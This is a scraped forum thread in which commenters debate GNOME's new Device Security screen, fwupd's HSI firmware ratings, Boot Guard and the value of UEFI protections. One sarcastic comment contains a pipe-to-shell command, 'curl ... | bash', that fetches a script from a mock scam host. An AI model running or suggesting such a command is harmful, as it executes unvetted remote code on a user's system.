Originally posted by rabcor
View Post
Announcement
Collapse
No announcement yet.
Ubuntu Isn't Yet Onboard With GNOME's "Device Security" Screen
Collapse
X
-
- Likes 4
-
Originally posted by Shiba View Post
"You want me to run curl -s http://definitely.not/a_scam.sh | bash? GNOME says my system is secure, so it must be OK"
- Probably you
Originally posted by binarybanana View Post
Exactly. This is so called security is a newspeak-like perversion of language. The more ``secure'' the system the less able are you to actually make sure it is. Especially on a laptop it's infuriating when you can't even swap out the WiFi card. Because.. that would prevent ME/firmware from snooping on your traffic. For your safety, of course.
Originally posted by kpedersen View PostYou probably aren't wrong but I am going to assume no-one in these forums is ever going to experience a UEFI attack. There are far more security issues around that needs fixing first than this almost theoretical nonsense.
Kind of verging on the really dumb stuff like Microsoft SecureBoot when the rest of the OS is just a security mess. Most people (including Linux users) don't even use encrypted disks rendering almost all of this stuff redundant. An attacker can just remove the disk and do what they want with it.
This type of feet-dragging is holding the entire Linux ecosystem back for no good reason.
- Likes 2
Leave a comment:
-
Originally posted by ssokolow View PostReminds me of how, last I heard, Windows 11 only allows self-built PCs to disable Virtualization Based Security, meaning pre-built PCs are at a permanent disadvantage if your goal is maximum performance.
2. Any Windows 11 Prebuild PC does have a MBEC capable CPU so you have no performance loss, thats what the shiny stickers are for OEM -> Microsoft -> Windows 11 Sticker yay.
- Likes 1
Leave a comment:
-
Originally posted by kpedersen View PostCan you find a more reliable / non-biased source?
- Likes 5
Leave a comment:
-
Well, it is indeed unhelpful and confusing. What those levels even mean? Secure from what exactly? Did they also publish a threat model they evaluate device "security" to? I would say that's not Device Security feature, that's Device Security theater.
Leave a comment:
-
Originally posted by ssokolow View Post
Ahh, yes. Let's encourage people to see it as virutous that your OEM-assembled system (Boot Guard wasn't even available for self-assembled PCs last I checked) has the "feature" that burns extra signature checks into one-time programmable memory in the PCH, permanently ruling out the possibility of BIOS modding and/or Coreboot-y things.
Reminds me of how, last I heard, Windows 11 only allows self-built PCs to disable Virtualization Based Security, meaning pre-built PCs are at a permanent disadvantage if your goal is maximum performance.
- Likes 1
Leave a comment:
-
Originally posted by jntesteves View Post
Fwupd's HSI is not a general security score, it only refers to the platform, as in the CPU, Mother Board, BIOS. It's of course your responsibility to take steps to be secure at other levels. The example you mention is hence irrelevant in this discussion. Note that other obvious security concerns, like SELinux status, root login, are omitted. Fwupd only concerns itself with firmware.
Leave a comment:
-
Originally posted by hughsie View Post
Can you find a more reliable / non-biased source? I'm not being confrontational, I personally can't. Best I can find is:
https://link.springer.com/article/10...46411619080224
And much of this just falls back on closed hardware makes it difficult to protect any further up the stack.Last edited by kpedersen; 28 August 2022, 06:08 PM.
- Likes 2
Leave a comment:
-
Originally posted by hughsie View Post
We have all this already in https://github.com/fwupd/fwupd/blob/...-common.c#L369 -- but Ubuntu will need to update to the latest fwupd release in time for the actual GNOME release.
It seems like the full detailed documentation of these is here: https://github.com/fwupd/fwupd/blob/...i.Tpm.EmptyPcr. Maybe there's a way for the UI to link there?
P.S. Why is suspend-to-idle supposedly any better than proper S3 suspend-to-RAM? Either way, if the contents of DRAM are unencrypted, an attacker who can remove DIMMs will probably be able to read a lot of your RAM.Last edited by yump; 28 August 2022, 05:51 PM.
- Likes 4
Leave a comment:
-
Originally posted by kpedersen View Postno-one in these forums is ever going to experience a UEFI attack.
- Likes 3
Leave a comment:
Leave a comment: